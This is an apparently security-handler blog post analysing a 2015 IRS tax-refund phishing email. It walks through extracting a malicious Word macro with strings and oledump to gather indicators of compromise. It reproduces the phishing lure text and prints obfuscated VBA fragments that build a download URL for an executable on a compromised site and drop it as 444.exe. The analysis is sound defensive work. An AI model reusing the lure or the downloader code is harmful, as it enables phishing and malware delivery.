It’s tax time and I’m starting to see a lot of Phish/SPAM about this subject. Below is popular one the last couple of days.
================= TAХ RЕTURN FOR ТНE YEАR 2014 RЕCАLCULАTION ОF YOUR ТАХ RЕFUND HМRС 2013-2014 LOСАL OFFIСE No. 2669 ТАX СREDIТ ОFFICЕR: Jimmie Bеnton TАХ REFUND ID NUМВER: 2440409 REFUND AМOUNТ: 2709.81 USD Dеar USER, The соntents оf this emаil and аnу attachmеnts arе соnfidentiаl and аs арpliсablе, сорyright in thеse is resеrvеd tо IRS Rеvеnuе Customs. Unless eхprеsslу аuthorised bу us, any further dissеmination or distributiоn of this еmail оr its аttaсhmеnts is рrоhibited.
If you are nоt the intеnded rеcipiеnt оf this emаil, plеаsе reрly to infоrm us thаt уоu have rесеived this еmаil in error and thеn deletе it without retaining аnу сoрy. I am sеnding this emаil to annоunсe: After the lаst аnnuаl саlсulаtiоn оf yоur fiscаl аctivitу we hаvе determined that yоu аrе еligiblе to rесеive a tаx refund оf 2709.81 USD Yоu havе attaсhed the taх return form with the TАX RЕFUND NUMВЕR ID: 2440409, сomplеte the tах rеturn fоrm аttаched to this mеssagе.
Aftеr соmрleting the form, pleаsе submit thе fоrm by clicking thе SUВMIТ buttоn оn fоrm. Sinсеrely, Jimmiе Вenton IRS Tax Credit Оffice ТAХ RЕFUND ID: US2440409-IRS
© Сорyright 2015, IRS Rеvenue &аmр; Сustоms US Аll rights rеserved. ======================
With so many of these types of mails, analysis needs to be quick to determine who may have been affected. Here is the process. 1. Rename the .doc file to .zip $mv tax_refund_2440409.zip MALWARE-tax_refund_2440409.zip
2. Unzip file $unzip MALWARE-tax_refund_2440409.zip
inflating: [Content_Types].xml inflating: _rels/.rels inflating: word/_rels/document.xml.rels inflating: word/document.xml inflating: word/header3.xml inflating: word/footer2.xml inflating: word/footer1.xml inflating: word/header2.xml inflating: word/header1.xml inflating: word/endnotes.xml inflating: word/footnotes.xml inflating: word/footer3.xml inflating: word/theme/theme1.xml inflating: word/_rels/vbaProject.bin.rels inflating: word/vbaProject.bin inflating: word/settings.xml inflating: word/vbaData.xml inflating: word/webSettings.xml inflating: word/styles.xml inflating: docProps/app.xml inflating: docProps/core.xml inflating: word/fontTable.xml
3. The vbaProject.bin is the code we want to look at and need to run strings on it.
$strings /word/vbaProject.bin
… Select * from Win32_OperatingSystem @echo off ping 2.2.1.1 -n … $someFilePath = 'c:\Users\ \AppData\Local\Temp\ 444.e strRT = ://www.zaphira.de/wp-admin/includes/file ...
Within about 2 minutes I was able to determine some basic IOCs and sees if anyone actually accessed the site or tried to ping the address.
Deeper If you want to dig deeper and spend a bit more time, you can install and configure oledump which was discussed on (hxxps://isc.sans.edu/diary/oledump+analysis+of+Rocket+Kitten+-+Guest+Diary+by+Didier+Stevens/19137).
To list all the parts of the file, just run the script with no switches. $python oledump_V0_0_8/oledump.py MALWARE-tax_refund_2440409.doc A: word/vbaProject.bin A1: 556 'PROJECT' A2: 71 'PROJECTwm' A3: 97 'UserForm1/\x01CompObj' A4: 266 'UserForm1/\x03VBFrame' A5: 58 'UserForm1/f' A6: 0 'UserForm1/o' A7: M 25751 'VBA/ThisDocument' A8: m 1159 'VBA/UserForm1' A9: 4506 'VBA/_VBA_PROJECT' A10: 811 'VBA/dir'
To get the whole script use the following. $python oledump.py -s A7 -v MALWARE-tax_refund_2440409.doc
The output is sent to the screen to look at. … Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://www.zaphira.de/wp-admin/includes/file" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34) … Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
In this case, oledump gave us a lot more info, but proves we were on the right track with simple strings of the file. Additionally, we can see an infected user may have a file called 444.exe . There are lots more local IOC’s we could create, but with the few network IOC’s we can get fast idea of possible affected users.
-- Tom Webb |
Tom 59 Posts ISC Handler Feb 20th 2015 |
Thread locked Subscribe |
Feb 20th 2015 7 years ago |
We've gotten several of these lately, so it's good to see the analysis. Thanks!
|
John 88 Posts |
Quote |
Feb 20th 2015 7 years ago |
Renaming the file from .doc (which but really should be written as .docx) to .zip is NOT necessary: unzip[.exe] works independent from a file extension.
If you want to be able to use the ZIP extension of Windows Explorer just add the following registry entry for all the OpenXML/OpenXPS (MIcrosoft Office 2007 and later) and of course 'Open Document Format' (OpenOffice/LibreOffice) file extensions: [HKEY_CLASSES_ROOT\.<ext>\OpenWithProgIDs] "CompressedFolder"=hex(0): This adds a context menue entry under "Open with ...". |
Anonymous |
Quote |
Feb 20th 2015 7 years ago |
Sign Up for Free or Log In to start participating in the conversation!